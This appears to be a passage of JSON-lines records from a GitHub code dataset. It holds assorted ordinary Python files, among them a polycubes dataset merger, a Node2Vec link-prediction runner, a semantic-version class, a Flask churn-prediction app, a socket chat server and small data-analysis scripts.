\".bin\" in f]\n root = r\n break\n print(\"Merging files: {}\".format(files))\n dataset = readDatasets(os.path.join(root, f) for f in files)\n\n phenos = {}\n for key, pheno in dataset.phenotypes.items():\n sizeId, idx, pid = key.rsplit('_', maxsplit=2)\n if not sizeId in phenos:\n phenos[sizeId] = []\n phenos[sizeId].append({'key': key, 'pid': pid, 'rule': pheno.rules[0]})\n phenos\n\n mergedDataset = phenotypes_pb2.Dataset()\n for sizeId, phenolist in phenos.items():\n groups = []\n for p in phenolist:\n foundGroup = False\n for group in groups:\n if (p['pid'] not in group['pids'] and \n polycubes.checkEquality(p['rule'], group['rule'], dataset.assemblyMode)\n ):\n foundGroup = True\n group['keys'].append(p['key'])\n group['pids'].append(p['pid'])\n break\n if not foundGroup:\n groups.append({\n 'keys': [p['key']],\n 'pids': [p['pid']],\n 'rule': p['rule']\n })\n\n for i, group in enumerate(groups):\n sample = dataset.phenotypes[group['keys'][0]]\n key = \"{}_{}_{}\".format(sample.size, i, os.getpid())\n p = mergedDataset.phenotypes[key]\n p.size = sample.size\n p.dim1 = sample.dim1\n p.dim2 = sample.dim2\n p.dim3 = sample.dim3\n for key in group['keys']:\n p.rules.extend(dataset.phenotypes[key].rules)\n\n for f in files:\n os.renames(os.path.join(root, f), os.path.join(root, 'merged', f))\n \n outpath = os.path.join(root, 'phenos_{}.bin'.format(os.getpid()))\n with open(outpath, \"wb\") as f:\n f.write(dataset.SerializeToString())\n print(\"Saved merged dataset as {}\".format(outpath))\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n merge(sys.argv[1])\n else:\n print(\"Please provide a path to an out directory\")\n merge('cpp/out')","repo_name":"Akodiat/polycubes","sub_path":"py/mergeProtobuf.py","file_name":"mergeProtobuf.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"45281060023","text":"from expipe_plugin_cinpla.imports import *\nfrom expipe_plugin_cinpla.scripts import adjust\nfrom . import utils\nfrom datetime import datetime as dt\n\n\ndef attach_to_cli(cli):\n @cli.command('adjust',\n short_help='Parse info about drive depth adjustment')\n @click.argument('entity-id', type=click.STRING)\n @click.option('--date',\n type=click.STRING,\n help=('The date of the surgery format: \"dd.mm.yyyyTHH:MM\" ' +\n 'or \"now\".'),\n )\n @click.option('-a', '--adjustment',\n multiple=True,\n callback=utils.validate_adjustment,\n help=('The adjustment amount on given anatomical location ' +\n 'given as '),\n )\n @click.option('--index',\n type=click.INT,\n help=('Index for module name, this is found automatically ' +\n 'by default.'),\n )\n @click.option('--init',\n is_flag=True,\n help='Initialize, retrieve depth from surgery.',\n )\n @click.option('-d', '--depth',\n multiple=True,\n callback=utils.validate_depth,\n help=('The depth given as e.g. ' +\n ' (omit <>).'),\n )\n @click.option('-u', '--user',\n type=click.STRING,\n help='The experimenter performing the adjustment.',\n )\n @click.option('-y', '--yes',\n is_flag=True,\n help='No query for correct adjustment.',\n )\n @click.option('--overwrite',\n is_flag=True,\n help='Overwrite existing action',\n )\n def _register_adjustment(entity_id, date, adjustment, user, index, init,\n depth, yes, overwrite):\n adjust.register_adjustment(\n project, entity_id, date, adjustment, user, index, init,\n depth, yes, overwrite)\n","repo_name":"CINPLA/expipe-plugin-cinpla","sub_path":"expipe_plugin_cinpla/cli/adjust.py","file_name":"adjust.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"23271859314","text":"import sys\nimport os\nfrom core import src\nimport cv2 as cv\n\n\"\"\"\n@author RansySun\n@create 2019-10-04-10:41\n\"\"\"\nsys.path.append(\n os.path.dirname(os.path.abspath(__file__))\n)\n\n\ndef play_video():\n # 读取视频\n cap = cv.VideoCapture(r'G:\\方优酷\\fangyouiku02\\youku_client\\db\\upload_movies\\1服务端注册功能封装.mp4')\n while cap.isOpened():\n ret, frame = cap.read()\n print(cap.read())\n if not ret:\n print(\"无法接收帧,流结束,正在退出\")\n break\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n cv.imshow('frame', gray)\n if cv.waitKey(1) == ord('q'):\n break\n cap.release()\n cv.destroyAllWindows()\n\n\nplay_video()\n\nif __name__ == '__main__':\n # 客户端启动入口\n src.run()\n","repo_name":"RandySun01/Videomanage_sys","sub_path":"youku_client/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"35870466330","text":"from sklearn.metrics import roc_auc_score, f1_score\n\nimport numpy as np, json, argparse, time\nfrom pprint import pprint\nimport logging.config\nimport os.path as osp\nimport sys\n\nimport torch\n\nfrom dataload import pred_triple\n\nfrom torch_geometric.nn import Node2Vec\nfrom apex import amp\n\nclass Runner(object):\n\n def load_data(self):\n \n path = osp.join('.', 'data', self.p.dataset)\n self.train_data = pred_triple(path, split='train')[0]\n self.val_data = pred_triple(path, split='val')[0]\n self.test_data = pred_triple(path, split='test')[0]\n \n max_index = torch.max(self.train_data['edge_label_index'])\n \n mm = [False if self.val_data.edge_label_index[0][ind] > max_index \n or self.val_data.edge_label_index[1][ind] > max_index else True \n for ind in range(len(self.val_data.edge_label_index[0]))]\n \n nn = [False if self.test_data.edge_label_index[0][ind] > max_index \n or self.test_data.edge_label_index[1][ind] > max_index else True \n for ind in range(len(self.test_data.edge_label_index[0]))]\n \n self.val_data.edge_index = torch.cat((self.val_data.edge_label_index[0][mm], self.val_data.edge_label_index[1][mm])).reshape(2, -1)\n self.val_data.edge_label = self.val_data.edge_label[mm]\n \n self.test_data.edge_index = torch.cat((self.test_data.edge_label_index[0][nn], self.test_data.edge_label_index[1][nn])).reshape(2, -1)\n self.test_data.edge_label = self.test_data.edge_label[nn]\n \n \n \n def get_logger(self, name, log_dir, config_dir):\n\n config_dict = json.load(open( config_dir + 'log_config.json'))\n config_dict['handlers']['file_handler']['filename'] = log_dir + name.replace('/', '-').replace(':', '-')\n\n logging.config.dictConfig(config_dict)\n logger = logging.getLogger(name)\n\n std_out_format = '%(asctime)s - [%(levelname)s] - %(message)s'\n consoleHandler = logging.StreamHandler(sys.stdout)\n consoleHandler.setFormatter(logging.Formatter(std_out_format))\n logger.addHandler(consoleHandler)\n\n return logger\n\n\n def __init__(self, params):\n \n self.p = params\n self.logger = self.get_logger(self.p.name, self.p.log_dir, self.p.config_dir)\n \n self.logger.info(vars(self.p))\n pprint(vars(self.p))\n\n if self.p.gpu != '-1' and torch.cuda.is_available():\n self.device = torch.device('cuda')\n else:\n self.device = torch.device('cpu')\n\n self.load_data()\n self.model = self.add_model(self.p.model)\n # self.optimizer = self.add_optimizer()\n self.model, self.optimizer = amp.initialize(self.model, self.add_optimizer(), \n opt_level=\"O1\")\n self.loader = self.get_loader()\n\n\n def add_model(self, model):\n \n if model.lower() == 'node2vec': \n model = Node2Vec(self.train_data.edge_label_index,\n # torch.cat((train_data.edge_label_index, test_data.edge_label_index), dim=1), \n embedding_dim=self.p.embedding_dim, walk_length=self.p.walk_length,\n context_size=self.p.context_size, walks_per_node=self.p.walks_per_node,\n num_negative_samples=self.p.num_negative_samples, p=self.p.p, q=self.p.q, sparse=True)\n \n else: raise NotImplementedError\n\n model.to(self.device)\n return model\n\n\n def add_optimizer(self):\n\n return torch.optim.SparseAdam(list(self.model.parameters()), lr=self.p.lr)\n\n\n def get_loader(self):\n num_workers = 0 if sys.platform.startswith('win') else 4\n return self.model.loader(batch_size=self.p.batch_size, shuffle=True, num_workers=num_workers)\n\n\n def save_model(self, save_path):\n\n state = {\n 'state_dict' : self.model.state_dict(),\n 'optimizer' : self.optimizer.state_dict(),\n 'args' : vars(self.p)\n }\n torch.save(state, save_path)\n\n\n def load_model(self, load_path):\n state = torch.load(load_path)\n state_dict = state['state_dict']\n self.model.load_state_dict(state_dict)\n self.optimizer.load_state_dict(state['optimizer'])\n\n\n def decode(self, z, edge_label_index):\n # print(edge_label_index.shape)\n return (z[edge_label_index[0]] * z[edge_label_index[1]]).sum(\n dim=-1\n ) # product of a pair of nodes on each edge\n \n\n def predict(self, data):\n\n self.model.eval()\n\n with torch.no_grad():\n z = self.model()\n # mm = [True if data.edge_label_index[0][ind]< len(z) and data.edge_label_index[1][ind] =a[i]):\n days+=1\n g = 2*a[i]\n if(g>x):\n x = g\n continue\n #---------------------\n #For elements smaller\n t = a[i]\n while(t>0):\n #print(1)\n days+=1\n h = 2*(t-x)\n if(h= n, Alice can get all\n Or else, dp(i,m) = suffix[i] - min(dp(i + x, max(m,x)), for x in range(1,2*m+1)) \n '''\n\n @lru_cache(None)\n def dp(self, i, m):\n result = self.piles[i]\n if i + 2*m < self.n:\n optimize = float('inf')\n for x in range(1, 2*m+1):\n optimize = min(optimize, self.dp(i+x, max(m,x)))\n result -= optimize\n return result\n \n def stoneGameII(self, piles: List[int]) -> int:\n self.n, self.piles = len(piles), piles\n for i in range(self.n-2,-1,-1):\n self.piles[i] += self.piles[i+1]\n return self.dp(0,1)\n# @lc code=end\n\n","repo_name":"huikinglam02gmail/Leetcode_solutions","sub_path":"1140.stone-game-ii.py","file_name":"1140.stone-game-ii.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9895896273","text":"\"\"\"Repository management tasks powered by `invoke`.\nMore information on `invoke` can be found at [pyinvoke.org](http://www.pyinvoke.org/).\n\"\"\"\nimport logging\nimport platform\nimport re\nfrom enum import Enum\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, no_type_check\n\nif TYPE_CHECKING: # pragma: no cover\n from typing import Any, Optional, Tuple, Union\n\n\nLOGGER = logging.getLogger(__file__)\nLOGGER.setLevel(logging.DEBUG)\n\n\nclass Emoji(str, Enum):\n \"\"\"Unicode strings for certain emojis.\"\"\"\n\n def __new__(cls, value: str) -> \"Emoji\":\n obj = str.__new__(cls, value)\n if platform.system() == \"Windows\":\n # Windows does not support unicode emojis, so we replace them with\n # their corresponding unicode escape sequences\n obj._value_ = value.encode(\"unicode_escape\").decode(\"utf-8\")\n else:\n obj._value_ = value\n return obj\n\n PARTY_POPPER = \"\\U0001f389\"\n CHECK_MARK = \"\\u2714\"\n CROSS_MARK = \"\\u274c\"\n CURLY_LOOP = \"\\u27b0\"\n\n\nclass SemanticVersion(str):\n \"\"\"A semantic version.\n\n See [SemVer.org](https://semver.org) for more information about semantic\n versioning.\n\n The semantic version is in this invocation considered to build up in the following\n way:\n\n ..-+\n\n Where the names in carets are callable attributes for the instance.\n\n When casting instances of `SemanticVersion` to `str`, the full version will be\n returned, i.e., as shown above, with a minimum of major.minor.patch.\n\n For example, for the version `1.5`, i.e., `major=1, minor=5`, the returned `str`\n representation will be the full major.minor.patch version: `1.5.0`.\n The `patch` attribute will default to `0` while `pre_release` and `build` will be\n `None`, when asked for explicitly.\n\n Precedence for comparing versions is done according to the rules outlined in point\n 11 of the specification found at [SemVer.org](https://semver.org/#spec-item-11).\n\n Parameters:\n major (Union[str, int]): The major version.\n minor (Optional[Union[str, int]]): The minor version.\n patch (Optional[Union[str, int]]): The patch version.\n pre_release (Optional[str]): The pre-release part of the version, i.e., the\n part supplied after a minus (`-`), but before a plus (`+`).\n build (Optional[str]): The build metadata part of the version, i.e., the part\n supplied at the end of the version, after a plus (`+`).\n\n Attributes:\n major (int): The major version.\n minor (int): The minor version.\n patch (int): The patch version.\n pre_release (str): The pre-release part of the version, i.e., the part\n supplied after a minus (`-`), but before a plus (`+`).\n build (str): The build metadata part of the version, i.e., the part supplied at\n the end of the version, after a plus (`+`).\n\n \"\"\"\n\n _REGEX = (\n r\"^(?P0|[1-9]\\d*)(?:\\.(?P0|[1-9]\\d*))?(?:\\.(?P0|[1-9]\\d*))?\"\n r\"(?:-(?P(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)\"\n r\"(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?\"\n r\"(?:\\+(?P[0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\"\n )\n\n @no_type_check\n def __new__(\n cls, version: \"Optional[str]\" = None, **kwargs: \"Union[str, int]\"\n ) -> \"SemanticVersion\":\n return super().__new__(\n cls, version if version else cls._build_version(**kwargs)\n )\n\n def __init__(\n self,\n version: \"Optional[str]\" = None,\n *,\n major: \"Union[str, int]\" = \"\",\n minor: \"Optional[Union[str, int]]\" = None,\n patch: \"Optional[Union[str, int]]\" = None,\n pre_release: \"Optional[str]\" = None,\n build: \"Optional[str]\" = None,\n ) -> None:\n if version is not None:\n if major or minor or patch or pre_release or build:\n raise ValueError(\n \"version cannot be specified along with other parameters\"\n )\n\n match = re.match(self._REGEX, version)\n if match is None:\n raise ValueError(\n f\"version ({version}) cannot be parsed as a semantic version \"\n \"according to the SemVer.org regular expression\"\n )\n major, minor, patch, pre_release, build = match.groups()\n\n self._major = int(major)\n self._minor = int(minor) if minor else 0\n self._patch = int(patch) if patch else 0\n self._pre_release = pre_release if pre_release else None\n self._build = build if build else None\n\n @classmethod\n def _build_version(\n cls,\n major: \"Optional[Union[str, int]]\" = None,\n minor: \"Optional[Union[str, int]]\" = None,\n patch: \"Optional[Union[str, int]]\" = None,\n pre_release: \"Optional[str]\" = None,\n build: \"Optional[str]\" = None,\n ) -> str:\n \"\"\"Build a version from the given parameters.\"\"\"\n if major is None:\n raise ValueError(\"At least major must be given\")\n version = str(major)\n if minor is not None:\n version += f\".{minor}\"\n if patch is not None:\n if minor is None:\n raise ValueError(\"Minor must be given if patch is given\")\n version += f\".{patch}\"\n if pre_release is not None:\n # semver spec #9: A pre-release version MAY be denoted by appending a\n # hyphen and a series of dot separated identifiers immediately following\n # the patch version.\n # https://semver.org/#spec-item-9\n if patch is None:\n raise ValueError(\"Patch must be given if pre_release is given\")\n version += f\"-{pre_release}\"\n if build is not None:\n # semver spec #10: Build metadata MAY be denoted by appending a plus sign\n # and a series of dot separated identifiers immediately following the patch\n # or pre-release version.\n # https://semver.org/#spec-item-10\n if patch is None:\n raise ValueError(\"Patch must be given if build is given\")\n version += f\"+{build}\"\n return version\n\n @property\n def major(self) -> int:\n \"\"\"The major version.\"\"\"\n return self._major\n\n @property\n def minor(self) -> int:\n \"\"\"The minor version.\"\"\"\n return self._minor\n\n @property\n def patch(self) -> int:\n \"\"\"The patch version.\"\"\"\n return self._patch\n\n @property\n def pre_release(self) -> \"Union[None, str]\":\n \"\"\"The pre-release part of the version\n\n This is the part supplied after a minus (`-`), but before a plus (`+`).\n \"\"\"\n return self._pre_release\n\n @property\n def build(self) -> \"Union[None, str]\":\n \"\"\"The build metadata part of the version.\n\n This is the part supplied at the end of the version, after a plus (`+`).\n \"\"\"\n return self._build\n\n def __str__(self) -> str:\n \"\"\"Return the full version.\"\"\"\n return (\n f\"{self.major}.{self.minor}.{self.patch}\"\n f\"{f'-{self.pre_release}' if self.pre_release else ''}\"\n f\"{f'+{self.build}' if self.build else ''}\"\n )\n\n def __repr__(self) -> str:\n \"\"\"Return the string representation of the object.\"\"\"\n return repr(self.__str__())\n\n def _validate_other_type(self, other: \"Any\") -> \"SemanticVersion\":\n \"\"\"Initial check/validation of `other` before rich comparisons.\"\"\"\n not_implemented_exc = NotImplementedError(\n f\"Rich comparison not implemented between {self.__class__.__name__} and \"\n f\"{type(other)}\"\n )\n\n if isinstance(other, self.__class__):\n return other\n\n if isinstance(other, str):\n try:\n return self.__class__(other)\n except (TypeError, ValueError) as exc:\n raise not_implemented_exc from exc\n\n raise not_implemented_exc\n\n def __lt__(self, other: \"Any\") -> bool:\n \"\"\"Less than (`<`) rich comparison.\"\"\"\n other_semver = self._validate_other_type(other)\n\n if self.major < other_semver.major:\n return True\n if self.major == other_semver.major:\n if self.minor < other_semver.minor:\n return True\n if self.minor == other_semver.minor:\n if self.patch < other_semver.patch:\n return True\n if self.patch == other_semver.patch:\n if self.pre_release is None:\n return False\n if other_semver.pre_release is None:\n return True\n return self.pre_release < other_semver.pre_release\n return False\n\n def __le__(self, other: \"Any\") -> bool:\n \"\"\"Less than or equal to (`<=`) rich comparison.\"\"\"\n return self.__lt__(other) or self.__eq__(other)\n\n def __eq__(self, other: \"Any\") -> bool:\n \"\"\"Equal to (`==`) rich comparison.\"\"\"\n other_semver = self._validate_other_type(other)\n\n return (\n self.major == other_semver.major\n and self.minor == other_semver.minor\n and self.patch == other_semver.patch\n and self.pre_release == other_semver.pre_release\n )\n\n def __ne__(self, other: \"Any\") -> bool:\n \"\"\"Not equal to (`!=`) rich comparison.\"\"\"\n return not self.__eq__(other)\n\n def __ge__(self, other: \"Any\") -> bool:\n \"\"\"Greater than or equal to (`>=`) rich comparison.\"\"\"\n return not self.__lt__(other)\n\n def __gt__(self, other: \"Any\") -> bool:\n \"\"\"Greater than (`>`) rich comparison.\"\"\"\n return not self.__le__(other)\n\n def next_version(self, version_part: str) -> \"SemanticVersion\":\n \"\"\"Return the next version for the specified version part.\n\n Parameters:\n version_part: The version part to increment.\n\n Returns:\n The next version.\n\n Raises:\n ValueError: If the version part is not one of `major`, `minor`, or `patch`.\n\n \"\"\"\n if version_part not in (\"major\", \"minor\", \"patch\"):\n raise ValueError(\n \"version_part must be one of 'major', 'minor', or 'patch', not \"\n f\"{version_part!r}\"\n )\n\n if version_part == \"major\":\n return self.__class__(f\"{self.major + 1}.0.0\")\n if version_part == \"minor\":\n return self.__class__(f\"{self.major}.{self.minor + 1}.0\")\n\n return self.__class__(f\"{self.major}.{self.minor}.{self.patch + 1}\")\n\n\ndef update_file(\n filename: Path, sub_line: \"Tuple[str, str]\", strip: \"Optional[str]\" = None\n) -> None:\n \"\"\"Utility function for tasks to read, update, and write files\"\"\"\n if strip is None and filename.suffix == \".md\":\n # Keep special white space endings for markdown files\n strip = \"\\n\"\n lines = [\n re.sub(sub_line[0], sub_line[1], line.rstrip(strip))\n for line in filename.read_text(encoding=\"utf8\").splitlines()\n ]\n filename.write_text(\"\\n\".join(lines) + \"\\n\", encoding=\"utf8\")\n","repo_name":"SINTEF/ci-cd","sub_path":"ci_cd/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26248217883","text":"import pickle\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pandas import DataFrame\r\nfrom flask import Flask,render_template, request, url_for, jsonify , redirect\r\nimport re\r\nimport random\r\nimport sqlite3\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef main():\r\n return render_template('index.html')\r\n\r\n@app.route(\"/prediction\")\r\ndef hello_word():\r\n return render_template('prediction.html')\r\n\r\n@app.route(\"/output\",methods=['GET','POST'])\r\ndef output():\r\n f = open(\"model.sav\", \"rb\") \r\n mdl = pickle.load(f)\r\n f.close()\r\n #fonction de prediction du\r\n def y_pred(X):\r\n y_pred = mdl.predict(X)\r\n return(y_pred)\r\n #fonction qui retourne le resultat final de la prédiction\r\n def resultat_finale(data):\r\n a = np.transpose(DataFrame(data)) \r\n a = str(y_pred(a)).strip('[]')\r\n return(int(a))\r\n a= resultat_finale(request.json.values())\r\n if a==1:\r\n phrase ='
Ce client est suceptible de quitter le service de la carte bancaire
'\r\n elif a==0:\r\n phrase='
Bonne nouvelle ! Ce client ne quittras pas le service de la carte bancaire .
'\r\n else:\r\n phrase='
Nous ne parvenons pas à faire de prédiction véfiez vous informations
.'\r\n return jsonify(phrase)\r\n\r\n@app.route(\"/echantillon\",methods=['GET', 'POST'])\r\ndef echantillon():\r\n\r\n return render_template('echantillon.html')\r\n\r\n@app.route(\"/resultat\",methods=['POST'])\r\ndef output_1():\r\n nb = request.form['input_number']\r\n conn = sqlite3.connect('db.sqlite3')\r\n cursor =conn.cursor()\r\n cursor.execute(\"SELECT Months_on_book,Months_Inactive_12_mon,Credit_Limit,Avg_Open_To_Buy,Total_Amt_Chng_Q4_Q1,Total_Trans_Amt,Total_Trans_Ct,Total_Ct_Chng_Q4_Q1, Attrition_Flag FROM data_credit_card order by random() LIMIT {} \".format(int(nb))) \r\n data = cursor.fetchall()\r\n f_data = data\r\n cursor.close()\r\n f = open(\"model.sav\", \"rb\")\r\n mdl = pickle.load(f)\r\n f.close()\r\n data=np.array(data)\r\n data=pd.DataFrame(data, columns=['Months_on_book','Months_Inactive_12_mon','Credit_Limit','Avg_Open_To_Buy','Total_Amt_Chng_Q4_Q1','Total_Trans_Amt','Total_Trans_Ct','Total_Ct_Chng_Q4_Q1','Attrition_Flag'])\r\n data = DataFrame(data)\r\n data = data.drop('Attrition_Flag',axis=1)\r\n y_pred = mdl.predict(data)\r\n y_pred = np.array(y_pred)\r\n y_pred = pd.DataFrame(y_pred) \r\n y_pred =DataFrame(y_pred)\r\n f_data = DataFrame(f_data) \r\n v = pd.concat([f_data,y_pred], axis=1)\r\n headings = ('Months_Inactive_12_mon','Months_Inactive_12_mon','Credit_Limit','Avg_Open_To_Buy','Total_Amt_Chng_Q4_Q1','Total_Trans_Amt','Total_Trans_Ct','Total_Ct_Chng_Q4_Q1','Attrition_Flag','Prediction')\r\n return render_template('resultat_.html',headings= headings ,data=v.values) \r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"benmatrood/Analyse_bank","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14630465740","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nw = np.logspace(-2, 1, 1000)\ns = w*1j\n\nplt.figure('Figure 5.4')\nKs = [0.1, 0.5, 1.0, 2.0]\nfor k in Ks:\n L = k/s * (2 - s)/(2 + s)\n T = L/(1+L)\n S = 1 - T\n plt.loglog(w, abs(S))\nplt.legend([\"k = %1.1f\" % K for K in Ks], loc=2)\nplt.xlabel('Frequency') \nplt.ylabel('Magnitude $|S|$')\nplt.show()\n","repo_name":"u20806389/CBT-700-Class-Group","sub_path":"reproductions/Figure/Figure_05_04.py","file_name":"Figure_05_04.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10677949055","text":"import random\nfrom turtle import Turtle, Screen\n\nis_race_on = False\nscreen = Screen()\nscreen.setup(width=500, height=400)\nuser_bet = screen.textinput(title=\"Make your bet\", prompt=\"Which turtle will win the race? Enter a color: \")\ncolors = [\"red\", \"orange\", \"yellow\", \"blue\", \"purple\", \"green\"]\ntim = []\nyy = -100\n\nfor color in colors:\n timmy = Turtle(shape=\"turtle\")\n timmy.color(color)\n timmy.penup()\n timmy.goto(x=-230, y=yy)\n tim.append(timmy)\n yy += 40\n\nif user_bet:\n is_race_on = True\n\nwhile is_race_on:\n for turtle in tim:\n if turtle.xcor() > 230:\n is_race_on = False\n winning_color = turtle.pencolor()\n if winning_color == user_bet:\n print(f\"You've won! The {winning_color} turtle is the winner!\")\n else:\n print(f\"You've lost! The {winning_color} turtle is the winner!\")\n rand_distance = random.randint(0, 10)\n turtle.forward(rand_distance)\n\nscreen.exitonclick()\n","repo_name":"KoshCocna/11_racingGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"12534027695","text":"from django.urls import path\n\nfrom .views import *\n\n\nurlpatterns = [\n path('', joinPage, name='login'),\n # path('register/', registerPage, name='register'),\n path('logout/', logoutUser, name='logout'),\n path('profile//', profilePage, name='profile'),\n path('members/', membersPage, name='members'),\n\n \n]\n","repo_name":"myvu0405/django-challenge-the-linkedin","sub_path":"linkedin/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26837578055","text":"# importacao das bibliotecas\nfrom funcoes_servidor import *\nfrom sys import *\n\nthread_clientes = minhaThread(conexao_clientes)\nthread_clientes.daemon = True\nthread_clientes.start()\nwhile (1):\n comandoServer = input()\n if comandoServer.upper() == \"SAIR()\":\n for sock in dicionario_clientes.keys():\n sock.send(encapsular('', 'SAIR', 'Servidor encerrando...'))\n serverSocket.close() # encerra o socket do servidor\n exit() #fecha o programa\n elif comandoServer.upper() == \"LISTA()\":\n if len(dicionario_clientes) is not 0:\n for nome_cliente, endereco_cliente in zip(dicionario_clientes.values(),dicionario_enderecos_clientes.values()):\n item = \"<\"+nome_cliente+\",\"+endereco_cliente[0]+\",\"+str(endereco_cliente[1])+\">\"\n print(item) \n else:\n print(\"Nao existem nenhum cliente conectado!\")\n\n","repo_name":"mateus-abrantes/Chat","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2575572375","text":"\"\"\"\r\nFilename_rev: Finding Numbers in a Haystack.py\r\n\r\nAuthor: Phillip Truong\r\n\r\nEmail Address: phil_t_@hotmail.com\r\n\r\nDate: 2016-09-13\r\n\r\nSummary of Requirements: (if applicable). https://www.coursera.org/learn/python-network-data\r\n\r\nDescription: Counting numbers in lines and then adding them.\r\n\r\n\"\"\"\r\n\r\nimport re\r\n\r\nlist_num = []\r\n\r\nf = open('Finding Numbers in a Haystack (Actual)', 'r')\r\n\r\nfor line in f:\r\n line_num = (re.findall('[0-9]+', line))\r\n if line_num != []:\r\n for i in line_num:\r\n list_num.append(int(i))\r\n\r\nprint(sum(list_num))\r\n","repo_name":"sunearn/Coursera-Using-Python-to-Access-Web-Data","sub_path":"Week2:Finding Numbers in a Haystack.py","file_name":"Week2:Finding Numbers in a Haystack.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19928299534","text":"from sys import argv\nimport numpy as np\nimport os\nimport math\nimport struct\ndef del_0x(h2):\n return h2[2:]#去掉0x\ndef hex_to_float(h):\n tuple1=struct.unpack('>d', bytes().fromhex(h.strip().zfill(16)))\n list1 = list(tuple1)\n return float(list1[0])\ndef float_to_hex(h1):\n return hex(struct.unpack('>Q', struct.pack('>d', h1))[0])\n\ndef distribution( ):\n f = open(\"../data/sampleResult1.txt\",'r')#argv[1] input1\n f1 = open(\"../data/error/\"+argv[3]+argv[4]+\".txt\", 'r') # argv[2] input2\n lines1 =int(argv[1])*4096 #51200000\n\n\n f2=open(\"../data/analysis/higherror/\"+argv[3]+argv[4]+\"_\"+argv[2]+\".txt\",'a+')\n\n for i in range(1, lines1 + 1):\n data1 = f.readline()\n data2 = f1.readline()\n flag=float(argv[2])#1.0e-15\n if math.isinf(hex_to_float(data2))==True:\n continue\n elif hex_to_float(data2)==1.0 or hex_to_float(data2)==-1.0:\n continue\n elif math.fabs(hex_to_float(data2)) >= flag:\n f2.write(data1.strip())\n f2.write(',')\n f2.write(data2.strip())\n f2.write(',')\n f2.write(str(hex_to_float(data2)))\n f2.write('\\n')\n else:\n continue\n #print(\"111\")\n f.close()\n f1.close()\n f2.close()\nif __name__ == '__main__':\n distribution()\n","repo_name":"LiangJinXiu/MLerror","sub_path":"bin/searchhigh.py","file_name":"searchhigh.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11415896829","text":"\nimport pandas as pd\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport warnings\nfrom datetime import datetime,date\nimport ast\nimport os\nimport json\n\nparkdata=pd.read_csv(\"data/phoenix.csv\")\nparkdata.columns=[\"index\",\"placekey\",\"low_svi_percentage\",\"safegraph_place_id\",\"parent_placekey\",\"parent_safegraph_place_id\",\"location_name\",\"street_address\",\"city\",\"region\",\"postal_code\",\"safegraph_brand_ids\",\"brands\",\"time\",\"date_range_end\",\"raw_visit_counts\",\"raw_visitor_counts\",\"visits_by_day\",\"poi_cbg\",\"visitor_home_cbgs\",\"visitor_daytime_cbgs\",\"visitor_country_of_origin\",\"distance_from_home\",\"median_dwell\",\"bucketed_dwell_times\",\"related_same_day_brand\",\"related_same_month_brand\",\"popularity_by_hour\",\"popularity_by_day\",\"device_type\"]\n\nparkdata[\"date\"] = pd.to_datetime(parkdata[\"time\"].str[0:10])\n\nparkdata.sort_values('date')\n\nmask1 = (parkdata[\"date\"] < pd.to_datetime('2020-03-01'))\nmask2 = (parkdata[\"date\"] >= pd.to_datetime('2020-03-01')) & (parkdata[\"date\"] <= pd.to_datetime('2020-03-31'))\nmask3 = (parkdata[\"date\"] > pd.to_datetime('2020-03-31'))\n\nparkdataPRE = parkdata.loc[mask1]\nparkdataSAHO = parkdata.loc[mask2]\nparkdataPOST = parkdata.loc[mask3]\n\na = [[0, 0, 0, 0, 0, 0, 0],[0, 0, 0, 0, 0, 0, 0]]\ncount = 0\nfor entry in parkdataPRE[\"popularity_by_day\"]:\n\n map = json.loads(entry)\n i = 0\n for x in map:\n a[0][i] += map[x]\n i+=1\n #print(map[x])\n count+=1\nprint(count)\ncount = 0\nfor entry in parkdataPOST[\"popularity_by_day\"]:\n\n map = json.loads(entry)\n i = 0\n for x in map:\n a[1][i] += map[x]\n i+=1\n #print(map[x])\n 